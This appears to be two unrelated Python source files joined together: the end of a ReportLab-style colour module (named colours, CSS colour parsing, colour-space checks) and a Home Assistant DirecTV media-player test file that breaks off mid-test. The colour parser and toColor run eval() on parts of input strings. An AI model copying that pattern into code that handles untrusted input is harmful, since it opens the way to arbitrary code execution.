brown = HexColor(0xA52A2A)
burlywood = HexColor(0xDEB887)
cadetblue = HexColor(0x5F9EA0)
chartreuse = HexColor(0x7FFF00)
chocolate = HexColor(0xD2691E)
coral = HexColor(0xFF7F50)
cornflowerblue = cornflower = HexColor(0x6495ED)
cornsilk = HexColor(0xFFF8DC)
crimson = HexColor(0xDC143C)
cyan = HexColor(0x00FFFF)
darkblue = HexColor(0x00008B)
darkcyan = HexColor(0x008B8B)
darkgoldenrod = HexColor(0xB8860B)
darkgray = HexColor(0xA9A9A9)
darkgrey = darkgray
darkgreen = HexColor(0x006400)
darkkhaki = HexColor(0xBDB76B)
darkmagenta = HexColor(0x8B008B)
darkolivegreen = HexColor(0x556B2F)
darkorange = HexColor(0xFF8C00)
darkorchid = HexColor(0x9932CC)
darkred = HexColor(0x8B0000)
darksalmon = HexColor(0xE9967A)
darkseagreen = HexColor(0x8FBC8B)
darkslateblue = HexColor(0x483D8B)
darkslategray = HexColor(0x2F4F4F)
darkslategrey = darkslategray
darkturquoise = HexColor(0x00CED1)
darkviolet = HexColor(0x9400D3)
deeppink = HexColor(0xFF1493)
deepskyblue = HexColor(0x00BFFF)
dimgray = HexColor(0x696969)
dimgrey = dimgray
dodgerblue = HexColor(0x1E90FF)
firebrick = HexColor(0xB22222)
floralwhite = HexColor(0xFFFAF0)
forestgreen = HexColor(0x228B22)
fuchsia = HexColor(0xFF00FF)
gainsboro = HexColor(0xDCDCDC)
ghostwhite = HexColor(0xF8F8FF)
gold = HexColor(0xFFD700)
goldenrod = HexColor(0xDAA520)
gray = HexColor(0x808080)
grey = gray
green = HexColor(0x008000)
greenyellow = HexColor(0xADFF2F)
honeydew = HexColor(0xF0FFF0)
hotpink = HexColor(0xFF69B4)
indianred = HexColor(0xCD5C5C)
indigo = HexColor(0x4B0082)
ivory = HexColor(0xFFFFF0)
khaki = HexColor(0xF0E68C)
lavender = HexColor(0xE6E6FA)
lavenderblush = HexColor(0xFFF0F5)
lawngreen = HexColor(0x7CFC00)
lemonchiffon = HexColor(0xFFFACD)
lightblue = HexColor(0xADD8E6)
lightcoral = HexColor(0xF08080)
lightcyan = HexColor(0xE0FFFF)
lightgoldenrodyellow = HexColor(0xFAFAD2)
lightgreen = HexColor(0x90EE90)
lightgrey = HexColor(0xD3D3D3)
lightpink = HexColor(0xFFB6C1)
lightsalmon = HexColor(0xFFA07A)
lightseagreen = HexColor(0x20B2AA)
lightskyblue = HexColor(0x87CEFA)
lightslategray = HexColor(0x778899)
lightslategrey = lightslategray
lightsteelblue = HexColor(0xB0C4DE)
lightyellow = HexColor(0xFFFFE0)
lime = HexColor(0x00FF00)
limegreen = HexColor(0x32CD32)
linen = HexColor(0xFAF0E6)
magenta = HexColor(0xFF00FF)
maroon = HexColor(0x800000)
mediumaquamarine = HexColor(0x66CDAA)
mediumblue = HexColor(0x0000CD)
mediumorchid = HexColor(0xBA55D3)
mediumpurple = HexColor(0x9370DB)
mediumseagreen = HexColor(0x3CB371)
mediumslateblue = HexColor(0x7B68EE)
mediumspringgreen = HexColor(0x00FA9A)
mediumturquoise = HexColor(0x48D1CC)
mediumvioletred = HexColor(0xC71585)
midnightblue = HexColor(0x191970)
mintcream = HexColor(0xF5FFFA)
mistyrose = HexColor(0xFFE4E1)
moccasin = HexColor(0xFFE4B5)
navajowhite = HexColor(0xFFDEAD)
navy = HexColor(0x000080)
oldlace = HexColor(0xFDF5E6)
olive = HexColor(0x808000)
olivedrab = HexColor(0x6B8E23)
orange = HexColor(0xFFA500)
orangered = HexColor(0xFF4500)
orchid = HexColor(0xDA70D6)
palegoldenrod = HexColor(0xEEE8AA)
palegreen = HexColor(0x98FB98)
paleturquoise = HexColor(0xAFEEEE)
palevioletred = HexColor(0xDB7093)
papayawhip = HexColor(0xFFEFD5)
peachpuff = HexColor(0xFFDAB9)
peru = HexColor(0xCD853F)
pink = HexColor(0xFFC0CB)
plum = HexColor(0xDDA0DD)
powderblue = HexColor(0xB0E0E6)
purple = HexColor(0x800080)
red = HexColor(0xFF0000)
rosybrown = HexColor(0xBC8F8F)
royalblue = HexColor(0x4169E1)
saddlebrown = HexColor(0x8B4513)
salmon = HexColor(0xFA8072)
sandybrown = HexColor(0xF4A460)
seagreen = HexColor(0x2E8B57)
seashell = HexColor(0xFFF5EE)
sienna = HexColor(0xA0522D)
silver = HexColor(0xC0C0C0)
skyblue = HexColor(0x87CEEB)
slateblue = HexColor(0x6A5ACD)
slategray = HexColor(0x708090)
slategrey = slategray
snow = HexColor(0xFFFAFA)
springgreen = HexColor(0x00FF7F)
steelblue = HexColor(0x4682B4)
tan = HexColor(0xD2B48C)
teal = HexColor(0x008080)
thistle = HexColor(0xD8BFD8)
tomato = HexColor(0xFF6347)
turquoise = HexColor(0x40E0D0)
violet = HexColor(0xEE82EE)
wheat = HexColor(0xF5DEB3)
white = HexColor(0xFFFFFF)
whitesmoke = HexColor(0xF5F5F5)
yellow = HexColor(0xFFFF00)
yellowgreen = HexColor(0x9ACD32)
fidblue=HexColor(0x3366cc)
fidred=HexColor(0xcc0033)
fidlightblue=HexColor("#d6e0f5")
ColorType=type(black)
################################################################
#
# Helper functions for dealing with colors. These tell you
# which are predefined, so you can print color charts;
# and can give the nearest match to an arbitrary color object
#
#################################################################
def colorDistance(col1, col2):
"""Returns a number between 0 and root(3) stating how similar
two colours are - distance in r,g,b, space. Only used to find
names for things."""
return math.sqrt(
(col1.red - col2.red)**2 +
(col1.green - col2.green)**2 +
(col1.blue - col2.blue)**2
)
def cmykDistance(col1, col2):
"""Returns a number between 0 and root(4) stating how similar
two colours are - distance in r,g,b, space. Only used to find
names for things."""
return math.sqrt(
(col1.cyan - col2.cyan)**2 +
(col1.magenta - col2.magenta)**2 +
(col1.yellow - col2.yellow)**2 +
(col1.black - col2.black)**2
)
_namedColors = None
def getAllNamedColors():
#returns a dictionary of all the named ones in the module
# uses a singleton for efficiency
global _namedColors
if _namedColors is not None: return _namedColors
import colors
_namedColors = {}
for (name, value) in colors.__dict__.items():
if isinstance(value, Color):
_namedColors[name] = value
return _namedColors
def describe(aColor,mode=0):
'''finds nearest colour match to aColor.
mode=0 print a string desription
mode=1 return a string description
mode=2 return (distance, colorName)
'''
namedColors = getAllNamedColors()
closest = (10, None, None) #big number, name, color
for (name, color) in namedColors.items():
distance = colorDistance(aColor, color)
if distance < closest[0]:
closest = (distance, name, color)
if mode<=1:
s = 'best match is %s, distance %0.4f' % (closest[1], closest[0])
if mode==0: print s
else: return s
elif mode==2:
return (closest[1], closest[0])
else:
raise ValueError, "Illegal value for mode "+str(mode)
def hue2rgb(m1, m2, h):
if h<0: h += 1
if h>1: h -= 1
if h*6<1: return m1+(m2-m1)*h*6
if h*2<1: return m2
if h*3<2: return m1+(m2-m1)*(4-6*h)
return m1
def hsl2rgb(h, s, l):
if l<=0.5:
m2 = l*(s+1)
else:
m2 = l+s-l*s
m1 = l*2-m2
return hue2rgb(m1, m2, h+1./3),hue2rgb(m1, m2, h),hue2rgb(m1, m2, h-1./3)
class cssParse:
def pcVal(self,v):
v = v.strip()
try:
c=eval(v[:-1])
if not isinstance(c,(float,int)): raise ValueError
c=min(100,max(0,c))/100.
except:
raise ValueError('bad percentage argument value %r in css color %r' % (v,self.s))
return c
def rgbPcVal(self,v):
return int(self.pcVal(v)*255+0.5)/255.
def rgbVal(self,v):
v = v.strip()
try:
c=eval(v[:])
if not isinstance(c,int): raise ValueError
return int(min(255,max(0,c)))/255.
except:
raise ValueError('bad argument value %r in css color %r' % (v,self.s))
def hueVal(self,v):
v = v.strip()
try:
c=eval(v[:])
if not isinstance(c,(int,float)): raise ValueError
return ((c%360+360)%360)/360.
except:
raise ValueError('bad hue argument value %r in css color %r' % (v,self.s))
def alphaVal(self,v,c=1,n='alpha'):
try:
a = eval(v.strip())
if not isinstance(a,(int,float)): raise ValueError
return min(c,max(0,a))
except:
raise ValueError('bad %s argument value %r in css color %r' % (n,v,self.s))
def __call__(self,s):
s = s.strip()
hsl = s.startswith('hsl')
rgb = s.startswith('rgb')
cmyk = s.startswith('cmyk')
c = 1
if hsl: n = 3
if rgb: n = 3
if cmyk:
n = 4
else:
cmyk = s.startswith('pcmyk')
if cmyk:
n = 5
c = 100
if not (rgb or hsl or cmyk): return None
self.s = s
n = s[n:]
ha = n.startswith('a')
n = n[(ha and 1 or 0):].strip()
if not n.startswith('(') or not n.endswith(')'):
raise ValueError('improperly formatted css style color %r' % s)
n = n[1:-1].split(',') #strip parens and split on comma
a = len(n)
b = cmyk and 4 or 3
if ha and a!=(b+1) or not ha and a!=b:
raise ValueError('css color %r has wrong number of components' % s)
if ha:
n,a = n[:b],self.alphaVal(n[b],c)
else:
a = c
if cmyk:
C = self.alphaVal(n[0],c,'cyan')
M = self.alphaVal(n[1],c,'magenta')
Y = self.alphaVal(n[2],c,'yellow')
K = self.alphaVal(n[3],c,'black')
return (c>1 and PCMYKColor or CMYKColor)(C,M,Y,K,alpha=a)
else:
if hsl:
R,G,B= hsl2rgb(self.hueVal(n[0]),self.pcVal(n[1]),self.pcVal(n[2]))
else:
R,G,B = map('%' in n[0] and self.rgbPcVal or self.rgbVal,n)
return Color(R,G,B,a)
cssParse=cssParse()
class toColor:
def __init__(self):
self.extraColorsNS = {} #used for overriding/adding to existing color names
#make case insensitive if that's your wish
def setExtraColorsNameSpace(self,NS):
self.extraColorsNS = NS
def __call__(self,arg,default=None):
'''try to map an arbitrary arg to a color instance
>>> toColor('rgb(128,0,0)')==toColor('rgb(50%,0%,0%)')
True
>>> toColor('rgb(50%,0%,0%)')!=Color(0.5,0,0,1)
True
>>> toColor('hsl(0,100%,50%)')==toColor('rgb(255,0,0)')
True
>>> toColor('hsl(-120,100%,50%)')==toColor('rgb(0,0,255)')
True
>>> toColor('hsl(120,100%,50%)')==toColor('rgb(0,255,0)')
True
>>> toColor('rgba(255,0,0,0.5)')==Color(1,0,0,0.5)
True
>>> toColor('cmyk(1,0,0,0)')==CMYKColor(1,0,0,0)
True
>>> toColor('pcmyk(100,0,0,0)')==PCMYKColor(100,0,0,0)
True
>>> toColor('cmyka(1,0,0,0,0.5)')==CMYKColor(1,0,0,0,alpha=0.5)
True
>>> toColor('pcmyka(100,0,0,0,0.5)')==PCMYKColor(100,0,0,0,alpha=0.5)
True
'''
if isinstance(arg,Color): return arg
if isinstance(arg,(tuple,list)):
assert 3<=len(arg)<=4, 'Can only convert 3 and 4 sequences to color'
assert 0<=min(arg) and max(arg)<=1
return len(arg)==3 and Color(arg[0],arg[1],arg[2]) or CMYKColor(arg[0],arg[1],arg[2],arg[3])
elif isinstance(arg,basestring):
C = cssParse(arg)
if C: return C
if arg in self.extraColorsNS: return self.extraColorsNS[arg]
C = getAllNamedColors()
s = arg.lower()
if s in C: return C[s]
try:
return toColor(eval(arg))
except:
pass
try:
return HexColor(arg)
except:
if default is None:
raise ValueError('Invalid color value %r' % arg)
return default
toColor = toColor()
def toColorOrNone(arg,default=None):
'''as above but allows None as a legal value'''
if arg is None:
return None
else:
return toColor(arg, default)
def setColors(**kw):
UNDEF = []
progress = 1
assigned = {}
while kw and progress:
progress = 0
for k, v in kw.items():
if isinstance(v,(tuple,list)):
c = map(lambda x,UNDEF=UNDEF: toColor(x,UNDEF),v)
if isinstance(v,tuple): c = tuple(c)
ok = UNDEF not in c
else:
c = toColor(v,UNDEF)
ok = c is not UNDEF
if ok:
assigned[k] = c
del kw[k]
progress = 1
if kw: raise ValueError("Can't convert\n%s" % str(kw))
getAllNamedColors()
for k, c in assigned.items():
globals()[k] = c
if isinstance(c,Color): _namedColors[k] = c
def Whiter(c,f):
'''given a color combine with white as c*f w*(1-f) 0<=f<=1'''
c = toColor(c)
if isinstance(c,CMYKColorSep):
c = c.clone()
if isinstance(c,PCMYKColorSep):
c.__class__ = PCMYKColor
else:
c.__class__ = CMYKColor
if isinstance(c,PCMYKColor):
w = _PCMYK_white
elif isinstance(c,CMYKColor): w = _CMYK_white
else: w = white
return linearlyInterpolatedColor(w, c, 0, 1, f)
def Blacker(c,f):
'''given a color combine with black as c*f+b*(1-f) 0<=f<=1'''
c = toColor(c)
if isinstance(c,CMYKColorSep):
c = c.clone()
if isinstance(c,PCMYKColorSep):
c.__class__ = PCMYKColor
else:
c.__class__ = CMYKColor
if isinstance(c,PCMYKColor):
b = _PCMYK_black
elif isinstance(c,CMYKColor): b = _CMYK_black
else: b = black
return linearlyInterpolatedColor(b, c, 0, 1, f)
def fade(aSpotColor, percentages):
"""Waters down spot colors and returns a list of new ones
e.g fade(myColor, [100,80,60,40,20]) returns a list of five colors
"""
out = []
for percent in percentages:
frac = percent * 0.01 #assume they give us numbers from 0 to 100
newCyan = frac * aSpotColor.cyan
newMagenta = frac * aSpotColor.magenta
newYellow = frac * aSpotColor.yellow
newBlack = frac * aSpotColor.black
newDensity = frac * aSpotColor.density
newSpot = CMYKColor( newCyan, newMagenta, newYellow, newBlack,
spotName = aSpotColor.spotName,
density = newDensity)
out.append(newSpot)
return out
def _enforceError(kind,c,tc):
if isinstance(tc,Color):
xtra = tc._lookupName()
xtra = xtra and '(%s)'%xtra or ''
else:
xtra = ''
raise ValueError('Non %s color %r%s' % (kind,c,xtra))
def _enforceSEP(c):
'''pure separating colors only, this makes black a problem'''
tc = toColor(c)
if not isinstance(tc,CMYKColorSep):
_enforceError('separating',c,tc)
return tc
def _enforceSEP_BLACK(c):
'''separating + blacks only'''
tc = toColor(c)
if not isinstance(tc,CMYKColorSep):
if isinstance(tc,Color) and tc.red==tc.blue==tc.green: #ahahahah it's a grey
tc = _CMYK_black.clone(density=1-tc.red)
elif not (isinstance(tc,CMYKColor) and tc.cyan==tc.magenta==tc.yellow==0): #ie some shade of grey
_enforceError('separating or black',c,tc)
return tc
def _enforceSEP_CMYK(c):
'''separating or cmyk only'''
tc = toColor(c)
if not isinstance(tc,CMYKColorSep):
if isinstance(tc,Color) and tc.red==tc.blue==tc.green: #ahahahah it's a grey
tc = _CMYK_black.clone(density=1-tc.red)
elif not isinstance(tc,CMYKColor):
_enforceError('separating or CMYK',c,tc)
return tc
def _enforceCMYK(c):
'''cmyk outputs only (rgb greys converted)'''
tc = toColor(c)
if not isinstance(tc,CMYKColor):
if isinstance(tc,Color) and tc.red==tc.blue==tc.green: #ahahahah it's a grey
tc = _CMYK_black.clone(black=1-tc.red,alpha=tc.alpha)
else:
_enforceError('CMYK',c,tc)
elif isinstance(tc,CMYKColorSep):
tc = tc.clone()
tc.__class__ = CMYKColor
return tc
def _enforceRGB(c):
tc = toColor(c)
if isinstance(tc,CMYKColor):
if tc.cyan==tc.magenta==tc.yellow==0: #ahahahah it's grey
v = 1-tc.black*tc.density
tc = Color(v,v,v,alpha=tc.alpha)
else:
_enforceError('RGB',c,tc)
return tc
def _chooseEnforceColorSpace(enforceColorSpace):
if enforceColorSpace is not None and not callable(enforceColorSpace):
if isinstance(enforceColorSpace,basestring): enforceColorSpace=enforceColorSpace.upper()
if enforceColorSpace=='CMYK':
enforceColorSpace = _enforceCMYK
elif enforceColorSpace=='RGB':
enforceColorSpace = _enforceRGB
elif enforceColorSpace=='SEP':
enforceColorSpace = _enforceSEP
elif enforceColorSpace=='SEP_BLACK':
enforceColorSpace = _enforceSEP_BLACK
elif enforceColorSpace=='SEP_CMYK':
enforceColorSpace = _enforceSEP_CMYK
else:
raise ValueError('Invalid value for Canvas argument enforceColorSpace=%r' % enforceColorSpace)
return enforceColorSpace
if __name__ == "__main__":
import doctest
doctest.testmod()
|
|
"""The tests for the DirecTV Media player platform."""
from __future__ import annotations
from datetime import datetime, timedelta
from unittest.mock import patch
from pytest import fixture
from homeassistant.components.directv.media_player import (
ATTR_MEDIA_CURRENTLY_RECORDING,
ATTR_MEDIA_RATING,
ATTR_MEDIA_RECORDED,
ATTR_MEDIA_START_TIME,
)
from homeassistant.components.media_player import DEVICE_CLASS_RECEIVER
from homeassistant.components.media_player.const import (
ATTR_INPUT_SOURCE,
ATTR_MEDIA_ALBUM_NAME,
ATTR_MEDIA_ARTIST,
ATTR_MEDIA_CHANNEL,
ATTR_MEDIA_CONTENT_ID,
ATTR_MEDIA_CONTENT_TYPE,
ATTR_MEDIA_DURATION,
ATTR_MEDIA_ENQUEUE,
ATTR_MEDIA_POSITION,
ATTR_MEDIA_POSITION_UPDATED_AT,
ATTR_MEDIA_SERIES_TITLE,
ATTR_MEDIA_TITLE,
DOMAIN as MP_DOMAIN,
MEDIA_TYPE_MOVIE,
MEDIA_TYPE_MUSIC,
MEDIA_TYPE_TVSHOW,
SERVICE_PLAY_MEDIA,
SUPPORT_NEXT_TRACK,
SUPPORT_PAUSE,
SUPPORT_PLAY,
SUPPORT_PLAY_MEDIA,
SUPPORT_PREVIOUS_TRACK,
SUPPORT_STOP,
SUPPORT_TURN_OFF,
SUPPORT_TURN_ON,
)
from homeassistant.const import (
ATTR_ENTITY_ID,
SERVICE_MEDIA_NEXT_TRACK,
SERVICE_MEDIA_PAUSE,
SERVICE_MEDIA_PLAY,
SERVICE_MEDIA_PREVIOUS_TRACK,
SERVICE_MEDIA_STOP,
SERVICE_TURN_OFF,
SERVICE_TURN_ON,
STATE_OFF,
STATE_PAUSED,
STATE_PLAYING,
STATE_UNAVAILABLE,
)
from homeassistant.helpers import entity_registry as er
from homeassistant.helpers.typing import HomeAssistantType
from homeassistant.util import dt as dt_util
from tests.components.directv import setup_integration
from tests.test_util.aiohttp import AiohttpClientMocker
ATTR_UNIQUE_ID = "unique_id"
CLIENT_ENTITY_ID = f"{MP_DOMAIN}.client"
MAIN_ENTITY_ID = f"{MP_DOMAIN}.host"
MUSIC_ENTITY_ID = f"{MP_DOMAIN}.music_client"
RESTRICTED_ENTITY_ID = f"{MP_DOMAIN}.restricted_client"
STANDBY_ENTITY_ID = f"{MP_DOMAIN}.standby_client"
UNAVAILABLE_ENTITY_ID = f"{MP_DOMAIN}.unavailable_client"
# pylint: disable=redefined-outer-name
@fixture
def mock_now() -> datetime:
"""Fixture for dtutil.now."""
return dt_util.utcnow()
async def async_turn_on(hass: HomeAssistantType, entity_id: str | None = None) -> None:
"""Turn on specified media player or all."""
data = {ATTR_ENTITY_ID: entity_id} if entity_id else {}
await hass.services.async_call(MP_DOMAIN, SERVICE_TURN_ON, data)
async def async_turn_off(hass: HomeAssistantType, entity_id: str | None = None) -> None:
"""Turn off specified media player or all."""
data = {ATTR_ENTITY_ID: entity_id} if entity_id else {}
await hass.services.async_call(MP_DOMAIN, SERVICE_TURN_OFF, data)
async def async_media_pause(
hass: HomeAssistantType, entity_id: str | None = None
) -> None:
"""Send the media player the command for pause."""
data = {ATTR_ENTITY_ID: entity_id} if entity_id else {}
await hass.services.async_call(MP_DOMAIN, SERVICE_MEDIA_PAUSE, data)
async def async_media_play(
hass: HomeAssistantType, entity_id: str | None = None
) -> None:
"""Send the media player the command for play/pause."""
data = {ATTR_ENTITY_ID: entity_id} if entity_id else {}
await hass.services.async_call(MP_DOMAIN, SERVICE_MEDIA_PLAY, data)
async def async_media_stop(
hass: HomeAssistantType, entity_id: str | None = None
) -> None:
"""Send the media player the command for stop."""
data = {ATTR_ENTITY_ID: entity_id} if entity_id else {}
await hass.services.async_call(MP_DOMAIN, SERVICE_MEDIA_STOP, data)
async def async_media_next_track(
hass: HomeAssistantType, entity_id: str | None = None
) -> None:
"""Send the media player the command for next track."""
data = {ATTR_ENTITY_ID: entity_id} if entity_id else {}
await hass.services.async_call(MP_DOMAIN, SERVICE_MEDIA_NEXT_TRACK, data)
async def async_media_previous_track(
hass: HomeAssistantType, entity_id: str | None = None
) -> None:
"""Send the media player the command for prev track."""
data = {ATTR_ENTITY_ID: entity_id} if entity_id else {}
await hass.services.async_call(MP_DOMAIN, SERVICE_MEDIA_PREVIOUS_TRACK, data)
async def async_play_media(
hass: HomeAssistantType,
media_type: str,
media_id: str,
entity_id: str | None = None,
enqueue: str | None = None,
) -> None:
"""Send the media player the command for playing media."""
data = {ATTR_MEDIA_CONTENT_TYPE: media_type, ATTR_MEDIA_CONTENT_ID: media_id}
if entity_id:
data[ATTR_ENTITY_ID] = entity_id
if enqueue:
data[ATTR_MEDIA_ENQUEUE] = enqueue
await hass.services.async_call(MP_DOMAIN, SERVICE_PLAY_MEDIA, data)
async def test_setup(
hass: HomeAssistantType, aioclient_mock: AiohttpClientMocker
) -> None:
"""Test setup with basic config."""
await setup_integration(hass, aioclient_mock)
assert hass.states.get(MAIN_ENTITY_ID)
assert hass.states.get(CLIENT_ENTITY_ID)
assert hass.states.get(UNAVAILABLE_ENTITY_ID)
async def test_unique_id(
hass: HomeAssistantType, aioclient_mock: AiohttpClientMocker
) -> None:
"""Test unique id."""
await setup_integration(hass, aioclient_mock)
entity_registry = er.async_get(hass)
main = entity_registry.async_get(MAIN_ENTITY_ID)
assert main.device_class == DEVICE_CLASS_RECEIVER
assert main.unique_id == "028877455858"
client = entity_registry.async_get(CLIENT_ENTITY_ID)
assert client.device_class == DEVICE_CLASS_RECEIVER
assert client.unique_id == "2CA17D1CD30X"
unavailable_client = entity_registry.async_get(UNAVAILABLE_ENTITY_ID)
assert unavailable_client.device_class == DEVICE_CLASS_RECEIVER
assert unavailable_client.unique_id == "9XXXXXXXXXX9"
async def test_supported_features(
hass: HomeAssistantType, aioclient_mock: AiohttpClientMocker
) -> None:
"""Test supported features."""
await setup_integration(hass, aioclient_mock)
# Features supported for main DVR
state = hass.states.get(MAIN_ENTITY_ID)
assert (
SUPPORT_PAUSE
| SUPPORT_TURN_ON
| SUPPORT_TURN_OFF
| SUPPORT_PLAY_MEDIA
| SUPPORT_STOP
| SUPPORT_NEXT_TRACK
| SUPPORT_PREVIOUS_TRACK
| SUPPORT_PLAY
== state.attributes.get("supported_features")
)
# Feature supported for clients.
state = hass.states.get(CLIENT_ENTITY_ID)
assert (
SUPPORT_PAUSE
| SUPPORT_PLAY_MEDIA
| SUPPORT_STOP
| SUPPORT_NEXT_TRACK
| SUPPORT_PREVIOUS_TRACK
| SUPPORT_PLAY
== state.attributes.get("supported_features")
)
async def test_check_attributes(
hass: HomeAssistantType,
mock_now: dt_util.dt.datetime,
aioclient_mock: AiohttpClientMocker,
) -> None:
"""Test attributes."""
await setup_integration(hass, aioclient_mock)
state = hass.states.get(MAIN_ENTITY_ID)
assert state.state == STATE_PLAYING
assert state.attributes.get(ATTR_MEDIA_CONTENT_ID) == "17016356"
assert state.attributes.get(ATTR_MEDIA_CONTENT_TYPE) == MEDIA_TYPE_MOVIE
assert state.attributes.get(ATTR_MEDIA_DURATION) == 7200
assert state.attributes.get(ATTR_MEDIA_POSITION) == 4437
assert state.attributes.get(ATTR_MEDIA_POSITION_UPDATED_AT)
assert state.attributes.get(ATTR_MEDIA_TITLE) == "Snow Bride"
assert state.attributes.get(ATTR_MEDIA_SERIES_TITLE) is None
assert state.attributes.get(ATTR_MEDIA_CHANNEL) == "{} ({})".format("HALLHD", "312")
assert state.attributes.get(ATTR_INPUT_SOURCE) == "312"
assert not state.attributes.get(ATTR_MEDIA_CURRENTLY_RECORDING)
assert state.attributes.get(ATTR_MEDIA_RATING) == "TV-G"
assert not state.attributes.get(ATTR_MEDIA_RECORDED)
assert state.attributes.get(ATTR_MEDIA_START_TIME) == datetime(
2020, 3, 21, 13, 0, tzinfo=dt_util.UTC
)
state = hass.states.get(CLIENT_ENTITY_ID)
assert state.state == STATE_PLAYING
assert state.attributes.get(ATTR_MEDIA_CONTENT_ID) == "4405732"
assert state.attributes.get(ATTR_MEDIA_CONTENT_TYPE) == MEDIA_TYPE_TVSHOW
assert state.attributes.get(ATTR_MEDIA_DURATION) == 1791
assert state.attributes.get(ATTR_MEDIA_POSITION) == 263
assert state.attributes.get(ATTR_MEDIA_POSITION_UPDATED_AT)
assert state.attributes.get(ATTR_MEDIA_TITLE) == "Tyler's Ultimate"
assert state.attributes.get(ATTR_MEDIA_SERIES_TITLE) == "Spaghetti and Clam Sauce"
assert state.attributes.get(ATTR_MEDIA_CHANNEL) == "{} ({})".format("FOODHD", "231")
assert state.attributes.get(ATTR_INPUT_SOURCE) == "231"
assert not state.attributes.get(ATTR_MEDIA_CURRENTLY_RECORDING)
assert state.attributes.get(ATTR_MEDIA_RATING) == "No Rating"
assert state.attributes.get(ATTR_MEDIA_RECORDED)
assert state.attributes.get(ATTR_MEDIA_START_TIME) == datetime(
2010, 7, 5, 15, 0, 8, tzinfo=dt_util.UTC
)
state = hass.states.get(MUSIC_ENTITY_ID)
assert state.state == STATE_PLAYING
assert state.attributes.get(ATTR_MEDIA_CONTENT_ID) == "76917562"
assert state.attributes.get(ATTR_MEDIA_CONTENT_TYPE) == MEDIA_TYPE_MUSIC
assert state.attributes.get(ATTR_MEDIA_DURATION) == 86400
assert state.attributes.get(ATTR_MEDIA_POSITION) == 15050
assert state.attributes.get(ATTR_MEDIA_POSITION_UPDATED_AT)
assert state.attributes.get(ATTR_MEDIA_TITLE) == "Sparkle In Your Eyes"
assert state.attributes.get(ATTR_MEDIA_ARTIST) == "Gerald Albright"
assert state.attributes.get(ATTR_MEDIA_ALBUM_NAME) == "Slam Dunk (2014)"
assert state.attributes.get(ATTR_MEDIA_SERIES_TITLE) is None
assert state.attributes.get(ATTR_MEDIA_CHANNEL) == "{} ({})".format("MCSJ", "851")
assert state.attributes.get(ATTR_INPUT_SOURCE) == "851"
assert not state.attributes.get(ATTR_MEDIA_CURRENTLY_RECORDING)
assert state.attributes.get(ATTR_MEDIA_RATING) == "TV-PG"
assert not state.attributes.get(ATTR_MEDIA_RECORDED)
assert state.attributes.get(ATTR_MEDIA_START_TIME) == datetime(
2020, 3, 21, 10, 0, 0, tzinfo=dt_util.UTC
)
state = hass.states.get(STANDBY_ENTITY_ID)
assert state.state == STATE_OFF
assert state.attributes.get(ATTR_MEDIA_CONTENT_ID) is None
assert state.attributes.get(ATTR_MEDIA_CONTENT_TYPE) is None
assert state.attributes.get(ATTR_MEDIA_DURATION) is None
assert state.attributes.get(ATTR_MEDIA_POSITION) is None
assert state.attributes.get(ATTR_MEDIA_POSITION_UPDATED_AT) is None
assert state.attributes.get(ATTR_MEDIA_TITLE) is None
assert state.attributes.get(ATTR_MEDIA_ARTIST) is None
assert state.attributes.get(ATTR_MEDIA_ALBUM_NAME) is None
assert state.attributes.get(ATTR_MEDIA_SERIES_TITLE) is None
assert state.attributes.get(ATTR_MEDIA_CHANNEL) is None
assert state.attributes.get(ATTR_INPUT_SOURCE) is None
assert not state.attributes.get(ATTR_MEDIA_CURRENTLY_RECORDING)
assert state.attributes.get(ATTR_MEDIA_RATING) is None
assert not state.attributes.get(ATTR_MEDIA_RECORDED)
state = hass.states.get(RESTRICTED_ENTITY_ID)
assert state.state == STATE_PLAYING
assert state.attributes.get(ATTR_MEDIA_CONTENT_ID) is None
assert state.attributes.get(ATTR_MEDIA_CONTENT_TYPE) is None
assert state.attributes.get(ATTR_MEDIA_DURATION) is None
assert state.attributes.get(ATTR_MEDIA_POSITION) is None
assert state.attributes.get(ATTR_MEDIA_POSITION_UPDATED_AT) is None
assert state.attributes.get(ATTR_MEDIA_TITLE) is None
assert state.attributes.get(ATTR_MEDIA_ARTIST) is None
assert state.attributes.get(ATTR_MEDIA_ALBUM_NAME) is None
assert state.attributes.get(ATTR_MEDIA_SERIES_TITLE) is None
assert state.attributes.get(ATTR_MEDIA_CHANNEL) is None
assert state.attributes.get(ATTR_INPUT_SOURCE) is None
assert not state.attributes.get(ATTR_MEDIA_CURRENTLY_RECORDING)
assert state.attributes.get(ATTR_MEDIA_RATING) is None
assert not state.attributes.get(ATTR_MEDIA_RECORDED)
state = hass.states.get(UNAVAILABLE_ENTITY_ID)
assert state.state == STATE_UNAVAILABLE
async def test_attributes_paused(
hass: HomeAssistantType,
mock_now: dt_util.dt.datetime,
aioclient_mock: AiohttpClientMocker,
):
"""Test attributes while paused."""
await setup_integration(hass, aioclient_mock)
state = hass.states.get(CLIENT_ENTITY_ID)
last_updated = state.attributes.get(ATTR_MEDIA_POSITION_UPDATED_AT)
# Test to make sure that ATTR_MEDIA_POSITION_UPDATED_AT is not
# updated if TV is paused.
with patch(
"homeassistant.util.dt.utcnow", return_value=mock_now + timedelta(minutes=5)
):
await async_media_pause(hass, CLIENT_ENTITY_ID)
await hass.async_block_till_done()
state = hass.states.get(CLIENT_ENTITY_ID)
assert state.state == STATE_PAUSED
assert state.attributes.get(ATTR_MEDIA_POSITION_UPDATED_AT) == last_updated
async def test_main_services(
hass: HomeAssistantType,
mock_now: dt_util.dt.datetime,
aioclient_mock: AiohttpClientMocker,
) -> None:
"""Test the different services."""
await setup_integration(hass, aioclient_mock)
with patch("directv.DIRECTV.remote") as remote_mock:
await async_turn_off(hass, MAIN_ENTITY_ID)
await hass.async_block_till_done()
remote_mock.assert_called_once_with("poweroff", "0")
with patch("directv.DIRECTV.remote") as remote_mock:
await async_turn_on(hass, MAIN_ENTITY_ID)
await hass.async_block_till_done()
remote_mock.assert_called_once_with("poweron", "0")
with patch("directv.DIRECTV.remote") as remote_mock:
await async_media_pause(hass, MAIN_ENTITY_ID)
await hass.async_block_till_done()
remote_mock.assert_called_once_with("pause", "0")
with patch("directv.DIRECTV.remote") as remote_mock:
await async_media_play(hass, MAIN_ENTITY_ID)
await hass.async_block_till_done()
remote_mock.assert_called_once_with("play", "0")
with patch("directv.DIRECTV.remote") as remote_mock:
await async_media_next_track(hass, MAIN_ENTITY_ID)
await hass.async_block_till_done()
remote_mock.assert_called_once_with("ffwd", "0")
with patch("directv.DIRECTV.remote") as remote_mock:
await async_media_previous_track(hass, MAIN_ENTITY_ID)
await hass.async_block_till_done()
remote_mock.assert_called_once_with("rew", "0")
with patch("directv.DIRECTV.remote") as remote_mock:
